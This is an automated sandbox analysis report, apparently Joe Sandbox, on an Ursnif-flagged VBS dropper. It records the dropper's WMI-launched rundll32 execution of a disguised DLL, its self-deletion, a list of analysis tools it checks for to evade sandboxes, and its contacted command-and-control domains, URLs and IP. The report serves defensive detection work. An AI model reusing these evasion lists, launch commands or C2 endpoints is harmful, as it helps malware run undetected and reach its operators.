            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C27AB0 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C27E1F push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70357A3C push ds; iretd
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7035922C push edi; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70354A03 push ds; retf 0000h
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_703562A0 push es; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70359301 push ebp; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70356B54 pushfd ; iretd
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70357CF3 push ecx; retf
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7035856E push ebp; retf
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70349D56 push esp; retf
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70349758 push esp; retf
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7038FF41 push ss; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70331A0A LoadLibraryA,GetProcAddress,

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fum.cppJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fum.cppJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\start[2021.09.09_15-26].vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.536145532.00000262BFE13000.00000004.00000001.sdmpBinary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Found evasive API chain (may stop execution after checking system information)Show sources
            Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
            Source: C:\Windows\System32\wscript.exe TID: 4084Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7034AC85 FindFirstFileExW,
            Source: rundll32.exe, 00000017.00000003.697749575.00000000006A1000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
            Source: rundll32.exe, 00000017.00000003.652715194.00000000006D5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW

            Anti Debugging:

            barindex
            Found API chain indicative of debugger detectionShow sources
            Source: C:\Windows\SysWOW64\rundll32.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70340D8D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70331A0A LoadLibraryA,GetProcAddress,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_703483FA GetProcessHeap,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7034A97E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70342485 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7038F0B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7038EBE6 push dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7038EFDF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70340D8D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: fum.cpp.0.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: atl.bigbigpoppa.com
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.251.90.253 80
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: pop.urlovedstuff.com
            Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C26CD6 cpuid
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_703310ED GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70331F7C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00C26CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation221Path InterceptionProcess Injection12Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting121LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsNative API12Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsExploitation for Client Execution1Logon Script (Mac)Logon Script (Mac)File Deletion1NTDSSystem Information Discovery145Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion13Cached Domain CredentialsSecurity Software Discovery351VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection12DCSyncVirtualization/Sandbox Evasion13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            start[2021.09.09_15-26].vbs10%VirustotalBrowse

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\fum.cpp13%ReversingLabsWin32.Worm.Cridex

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            23.2.rundll32.exe.c20000.0.unpack100%AviraHEUR/AGEN.1108168Download File

            Domains

            SourceDetectionScannerLabelLink
            pop.urlovedstuff.com9%VirustotalBrowse
            atl.bigbigpoppa.com9%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://atl.bigbigpoppa.com/100%Avira URL Cloudmalware
            http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2100%Avira URL Cloudmalware
            http://atl.bigbigpoppa.com/R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT100%Avira URL Cloudmalware
            http://pop.bigbigpoppa.com/100%Avira URL Cloudmalware
            http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5c100%Avira URL Cloudmalware
            http://atl.bigbigpoppa.com/0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            pop.urlovedstuff.com
            185.251.90.253
            truetrueunknown
            atl.bigbigpoppa.com
            185.251.90.253
            truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2true
            • Avira URL Cloud: malware
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://atl.bigbigpoppa.com/rundll32.exe, 00000017.00000002.732610833.000000000066A000.00000004.00000020.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://atl.bigbigpoppa.com/R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCTrundll32.exe, 00000017.00000003.651548557.00000000006CF000.00000004.00000001.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://pop.bigbigpoppa.com/rundll32.exe, 00000017.00000002.732610833.000000000066A000.00000004.00000020.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5crundll32.exe, 00000017.00000003.652840050.00000000006D5000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000003.697690406.00000000006D5000.00000004.00000001.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://atl.bigbigpoppa.com/0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5drundll32.exe, 00000017.00000002.733066508.00000000006D5000.00000004.00000001.sdmptrue
            • Avira URL Cloud: malware
            unknown

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            185.251.90.253
            pop.urlovedstuff.comRussian Federation
            35278SPRINTHOSTRUtrue

            General Information

            Joe Sandbox Version:33.0.0 White Diamond
            Analysis ID:481181
            Start date:10.09.2021
            Start time:13:48:06
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 8m 24s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:start[2021.09.09_15-26].vbs
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:31
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winVBS@7/2@4/1
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 21.2% (good quality ratio 20.6%)
            • Quality average: 80.8%
            • Quality standard deviation: 27.2%
            HCA Information:
            • Successful, ratio: 71%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .vbs
            • Override analysis time to 240s for JS/VBS files not yet terminated
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
            • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.82.210.154, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.49.157.6, 20.54.110.249
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            13:51:30API Interceptor1x Sleep call for process: wscript.exe modified
            13:52:04API Interceptor3x Sleep call for process: rundll32.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
